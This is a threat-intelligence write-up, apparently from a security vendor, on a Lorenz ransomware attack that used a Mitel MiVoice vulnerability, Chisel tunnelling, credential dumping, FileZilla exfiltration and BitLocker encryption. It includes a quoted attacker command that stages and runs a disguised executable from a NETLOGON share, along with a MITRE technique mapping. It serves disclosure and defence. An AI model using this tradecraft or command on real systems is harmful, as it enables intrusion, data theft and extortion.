In the Chaos of Lorenz, APG sORted It Out

Blackpoint Cyber’s Adversary Pursuit Group (APG) and Security Operations Center (SOC) analyzed a recent attack conducted by the Lorenz ransomware group. Lorenz has been active in the wild since early 2021 and is known to leverage a vulnerability in MiVoice Connect (CVE-2022-29499), one of many Mitel Voice-over-IP (VoIP) products that are used by organizations in critical sectors worldwide. This is done in order to exfiltrate data using FileZilla and encrypt data using Microsoft’s BitLocker Drive Encryption. The attack method involves a double extortion technique, requesting payment for decryption and destructing exfiltrated data from their leak site. It appears Lorenz targets larger, English-speaking, enterprise environments and requests a ransom between $500,000 and $700,000. During the SOC’s analysis of the incident, they were able to recover the malicious executable used to launch the encryption phase of the attack.

The APG analyzed the malicious executable, SVC_WSC.exe, and discovered the extraction and use of .NET Core and custom .NET dynamic link libraries (DLLs). This allows for the execution of the final BitLocker encryption payload instead of PowerShell, which has been seen in previous attacks. The switch to .NET Core DLLs is concerning because it is harder to detect and is a cross-platform framework, meaning the ransomware group could be targeting a wider variety of operating systems (OSs). APG also discovered the use of a hardcoded BitLocker recovery key, BitLocker password, and victim domain information, indicating the attack was targeted rather than a randomized widespread attack.

Initial Access and Execution

Based on evaluations from other security researchers, the Lorenz ransomware group has been gaining initial access by exploiting a vulnerability in the Mitel Service Appliance component of MiVoice Connect (CVE-2022-29499). When exploited, this vulnerability allows for command injection and remote code execution (RCE). Blackpoint’s SOC confirmed the network that this incident occurred on had a Mitel appliance exposed to the internet.

Affected devices include:

MiVoice Connect – Mitel Service Appliance versions:

• SA100
• SA400
• Virtual SA

Running software versions:

• MiVoice Connect 14.2 and earlier
  • R19.2 SP3 (22.20.2300.0) and earlier
  • R14.x and earlier

On April 19, 2022, Mitel released a script to temporarily fix the vulnerability (CVE-2022-29499) for releases R19.2 SP3 (and earlier) and R14.x (and earlier), before releasing a fully patched version (R19.3) in July of 2022.

Once the threat actors established command execution via HTTP GET requests, they used cURL to download a shell script that opens a reverse shell connection directly to the Mitel system. After gaining initial access, the adversary is known to wait an extended period of time, typically a month or more, before continuing with the attack. Lorenz uses Chisel to utilize the Mitel VoIP device as a SOCKS proxy server which creates a Secure Shell (SSH) tunnel transported over HTTP. After setting up the proxy server, they used CrackMapExec, taking advantage of Active Directory features and protocols for credential dumping. This allowed them to compromise two domain administrator accounts required for the follow-on activity in the attack. After initial access and compromising domain administrator accounts, the adversary moved on to discovery and lateral movement.

The threat actors used certuil.exe to identify domain controllers in the environment. A certuil.exe is a command-line tool used to display certification authority (CA) configurations. The Microsoft built-in tools  were used to identify workstations, servers, and network devices within the environment. System and network enumeration allows the attackers to gain a digital view of the assets within the enterprise system. This helps them identify critical systems and paths of attack for lateral movement.

• netsh: configure and display firewall information,
• ipconfig: display TCP/IP network configurations, and
• netstat: displays active and listening TCP ports,

Once the threat actors identified critical systems and open paths to proceed with the attack, they used the compromised administrator accounts to abuse remote desktop protocol (RDP) for lateral movement. After compromising the domain controller, a file masquerading as a JPEG was dropped in the NETLOGON share to be pulled to the other systems during the final stage of the attack.

FileZilla, a free and open-source FTP/SFTP ([Secure] File Transfer Protocol) software, was installed using the compromised administrator accounts and used to exfiltrate victim data and information over port 22 using the Chisel SOCKS proxy server. After exfiltrating data, they moved on to the last step of the attack, encrypting systems using Microsoft’s BitLocker Drive Encryption.

A cmd.exe child process under svchost.exe, owned by SYSTEM, copied domain.jpeg from the domain controller, NETLOGON share, to the target machine.

/Q /C (copy \\domain.com\NETLOGON\domain.jpeg c:\SVC_WSC.exe \
&& dir && dir && c:\SVC_WSC.exe && dir)

SVC_WSC.exe is a C++ compiled executable which extracts all the .NET Core DLLs required for the final piece of the attack: full disk encryption. The DLLs are extracted into a folder resembling “C:\Users\Username\AppData\Local\Temp\.net\lorenz\1jtvsmf0.wwh” (see Figure 1).

Figure 1: DLL files extracted during SVC_WSC.exe process.

After extraction, several DLLs are injected back into the SVC_WSC.exe process (see Figure 2). 

Figure 2. The highlighted modules are injected into the SVC_WSC.exe process.

The main.dll library contains the BitLocker encryptor, recovery key, and password, which were discovered through the APG’s reverse engineering efforts.

The APG wrote a Python script that parses, extracts, and decodes obfuscated strings from main.dll, which includes a BitLocker Recovery Key and password (see Figures 3-6).

Figure 3: Function for extracting OR key from resources.

Figure 4: Function to Decode string given encrypted string, encryption number, and OR key.

Figure 5: Output from the decoder.py script comparing encrypted and cleartext.

Figure 6: Output of the BitLocker Recovery Key and password.

The decoder script is available on the Blackpoint GitHub page, allowing victims to extract their decoded recovery information. This script has only been tested on the sample obtained during this incident.

Update the following Mitel Devices:

Mitel Service Appliance versions.

• SA100,
• SA400,
• Virtual SA,

running software versions:

• MiVoice Connect 14.2 and earlier,
  • R19.2 SP3 (22.20.2300.0) and earlier,
  • R14.x and earlier.

Patched Release:

• R19.3 (released July 2022)

Arctic Wolf has created Suricata and YARA rules for detecting Lorenz.

It appears the Lorenz ransomware group will continue with a couple of methods:

1. Develop and update their ransomware attacks by implementing new features such as leveraging .NET DLLs
2. Utilize double extortion.

The switch to .NET could be a sign of a larger change ahead, including the spread to multiple OSs. Double extortion methods allow threat actors to continue to gain leverage if the files are recovered through backups. Since the patch for Mitel MiVoice has been available since July 2022, allowing more companies to patch the vulnerability, Lorenz will likely move on to a different initial access path. That said, mitigation is still the best solution. Continue to keep an eye out for further updates and read up on all Blackpoint APG intel. The group has developed a Python decoder script, also available on GitHub, based on the sample they reverse engineered. The script analyzes the final payload file (main.dll) of the attack to extract the BitLocker recovery key and password. We hope this threat intelligence helps arm your defenses.

SHA256

We were able to collect hashes for the SVC_WSC.exe and main.dll files but given they are unique to the customer we cannot release them at this time.

Initial Access

MITRE Technique: Exploit Public-Facing Application

• Description: Exploited Mitel MiVoice Connect vulnerability (CVE-2022-29499)

Resource Development

MITRE Technique: Obtain Capabilities – Tool

• Description:
  • FileZilla – Exfiltration
  • Chisel – Defense Evasion
  • BitLocker – Impact 

Command and Control

MITRE Technique: Encrypted Channel

• Description: Reverse shell encrypted with TLS

MITRE Technique: Non-Application Layer Protocol

• Description: Chisel used to create SOCKS proxy server, an SSH tunnel transported over HTTP

Credential Access

MITRE Technique: OS Credential Dumping – LSASS Memory

• Description: CrackMapExec to dump Active Directory credentials

Privilege Escalation

MITRE Technique: Domain Accounts

• Description: Obtained domain administrator credentials

MITRE Technique: Local Accounts

• Description: Obtained local administrator credentials

Discovery

MITRE Technique: Network System Discovery

• Description: netstat – displays active and listening TCP ports

MITRE Technique: System Network Configuration Discovery

• Description:
  • netsh – configure and display firewall information
  • ipconfig – display TCP/IP network configurations

MITRE Technique: Domain Trust Discovery

• Description: certuil.exe – identify domain controllers

Lateral Movement

MITRE Technique: Remote Services – Remote Desktop Protocol

• Description: Used obtained credentials for Remote Desktop access

Exfiltration

MITRE Technique: Exfiltration over C2 Channel

• Description: Exfiltration was passed through SOCKS proxy using FileZilla

Impact

MITRE Technique: Data Encrypted for Impact

• Description: BitLocker used to encrypt systems

Defense Evasion

MITRE Technique: Obfuscated Files or Information

• Description:
  • Payload was copied from NETLOGON as .jpeg file
  • Main.dll contains obfuscated strings

• Arctic Wolf – Chiseling In: Lorenz Ransomware Group Cracks MiVoice And Calls Back For Free
• Mitel – Mitel Product Security Advisory 22-0002
• NIST – CVE-2022-29499 Detail
• Github – Chisel